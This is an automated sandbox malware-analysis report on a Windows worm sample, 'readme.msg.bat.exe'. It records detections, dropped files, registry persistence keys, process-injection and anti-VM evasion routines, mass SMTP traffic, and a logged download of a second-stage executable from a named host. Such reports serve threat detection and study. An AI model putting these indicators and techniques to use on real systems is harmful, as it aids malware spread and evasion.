Windows Analysis Report
readme.msg.bat.exe

Overview

General Information

Sample name: readme.msg.bat.exe
Analysis ID: 1579447
MD5: 99b66e501870ce033026d55dc5274ab0
SHA1: 57d7b4f8fc6feb18187a59fcbe01029419f25be3
SHA256: c0a793e1d786cc30e8e17ab97a0a614dfc6647033fea780d88dc4fea205c2674
Tags: exe, user-TeamDreier

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to inject threads in other processes
Creates an undocumented autostart registry key
Detected PE file pumping (to bypass AV & sandboxing)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: readme.msg.bat.exe Avira: detected
Source: C:\Windows\tserv.exe Avira: detection malicious, Label: WORM/Stration.C
Source: C:\Windows\tserv.exe ReversingLabs: Detection: 94%
Source: readme.msg.bat.exe Virustotal: Detection: 81%
Source: readme.msg.bat.exe ReversingLabs: Detection: 94%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 84.2% probability
Source: C:\Windows\tserv.exe Joe Sandbox ML: detected
Source: readme.msg.bat.exe Joe Sandbox ML: detected
Source: readme.msg.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose, 0_2_00406360
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: Joe Sandbox View IP Address: 67.195.228.94 67.195.228.94
Source: Joe Sandbox View IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View IP Address: 67.195.228.109 67.195.228.109
Source: Network traffic Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49707 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49765 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49765 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49874 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49874 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49820 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49820 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49879 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49879 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49769 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49928 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49824 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49934 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49934 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49928 -> 193.166.255.171:80
Source: global traffic TCP traffic: 192.168.2.5:49713 -> 67.195.204.74:25
Source: global traffic TCP traffic: 192.168.2.5:49762 -> 67.195.228.94:25
Source: global traffic TCP traffic: 192.168.2.5:49814 -> 67.195.228.109:25
Source: global traffic TCP traffic: 192.168.2.5:49922 -> 142.250.141.26:25
Source: global traffic TCP traffic: 192.168.2.5:49971 -> 142.250.157.26:25
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic DNS traffic detected: DNS query: yahoo.com
Source: global traffic DNS traffic detected: DNS query: www4.cedesunjerinkas.com
Source: global traffic DNS traffic detected: DNS query: mta6.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: mta7.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: mta5.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: gmail.com
Source: global traffic DNS traffic detected: DNS query: alt1.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt2.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt3.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt4.gmail-smtp-in.l.google.com
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00423D83: QueryDosDeviceA,lstrcpyA,lstrcatA,GetLastError,lstrcpyA,lstrcatA,DefineDosDeviceA,GetLastError,lstrcpyA,lstrcatA,CreateFileA,DeviceIoControl,GetLastError,GetLastError,DefineDosDeviceA,GetLastError, 0_2_00423D83
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00411800 0_2_00411800
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004108D0 0_2_004108D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C8E0 0_2_0040C8E0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040F0E9 0_2_0040F0E9
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00410907 0_2_00410907
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404110 0_2_00404110
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409119 0_2_00409119
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040F1C7 0_2_0040F1C7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 0_2_0040C1D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404990 0_2_00404990
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004091A7 0_2_004091A7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040E246 0_2_0040E246
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00428A08 0_2_00428A08
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00425214 0_2_00425214
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405310 0_2_00405310
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00408BC0 0_2_00408BC0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00415BD0 0_2_00415BD0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041B3D0 0_2_0041B3D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040DBF0 0_2_0040DBF0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041E3A0 0_2_0041E3A0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409436 0_2_00409436
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409CF7 0_2_00409CF7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041BD00 0_2_0041BD00
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040EDE0 0_2_0040EDE0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040DE56 0_2_0040DE56
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041C660 0_2_0041C660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00410670 0_2_00410670
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040E676 0_2_0040E676
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409F47 0_2_00409F47
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040EF78 0_2_0040EF78
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040FF30 0_2_0040FF30
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405F30 0_2_00405F30
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: String function: 0042664C appears 45 times
Source: readme.msg.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.evad.winEXE@6/3@11/7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004047A0 lstrcatA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 0_2_004047A0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405090 GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetFileAttributesA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00405090
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041E0B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,CloseHandle, 0_2_0041E0B0
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Users\user\Desktop\A853.tmp Jump to behavior
Source: C:\Windows\tserv.exe Mutant created: NULL
Source: readme.msg.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\readme.msg.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: readme.msg.bat.exe Virustotal: Detection: 81%
Source: readme.msg.bat.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\Desktop\readme.msg.bat.exe File read: C:\Users\user\Desktop\readme.msg.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\readme.msg.bat.exe "C:\Users\user\Desktop\readme.msg.bat.exe"
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\tserv.exe C:\Windows\tserv.exe s
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\A853.tmp
Source: unknown Process created: C:\Windows\tserv.exe "C:\Windows\tserv.exe" s
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\tserv.exe C:\Windows\tserv.exe s Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\A853.tmp Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: efswrt.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA, 0_2_0041F660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042647C push eax; ret 0_2_0042649A
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004254B0 push eax; ret 0_2_004254C4
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004254B0 push eax; ret 0_2_004254EC
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00426687 push ecx; ret 0_2_00426697

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\readme.msg.bat.exe Executable created and started: C:\Windows\tserv.exe Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe Jump to dropped file

Boot Survival

Source: C:\Windows\tserv.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs Jump to behavior
Source: C:\Windows\tserv.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tserv Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041D159 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_0041D159

Malware Analysis System Evasion

Source: readme.msg.bat.exe Static PE information: Resource name: RT_ICON size: 0xffffff28
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1E0 second address: 40C1EE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC919F7D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+08h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1EE second address: 40C1FC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC8D9B375h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+0Ch], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1FC second address: 40C20A instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC919F7D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+10h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\readme.msg.bat.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\tserv.exe TID: 616 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\tserv.exe TID: 6676 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\tserv.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose, 0_2_00406360
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00429F44 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 0_2_00429F44
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA, 0_2_0041F660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004210D0 GetProcessHeap,GetProcessHeap,HeapAlloc,RegOpenKeyExA,GetLastError,GetProcessHeap,HeapFree,RegCloseKey, 0_2_004210D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042731A SetUnhandledExceptionFilter, 0_2_0042731A
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042732E SetUnhandledExceptionFilter, 0_2_0042732E

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404840 OpenProcess,lstrlenA,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,CreateRemoteThread, 0_2_00404840
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00423260 GetProcessHeap,HeapAlloc,HeapAlloc,HeapAlloc,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,InitializeSecurityDescriptor,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,GetTokenInformation,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,IsValidSecurityDescriptor, 0_2_00423260
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: GetLocaleInfoA, 0_2_0042C8B2
Source: C:\Windows\SysWOW64\notepad.exe Queries volume information: C:\Users\user\Desktop\A853.tmp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00401830 ExpandEnvironmentStringsA,GetLocalTime,CreateFileA,CloseHandle, 0_2_00401830
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040BE00 lstrlenA,GetLocalTime,GetTimeZoneInformation,lstrlenA, 0_2_0040BE00
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00425D91 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA, 0_2_00425D91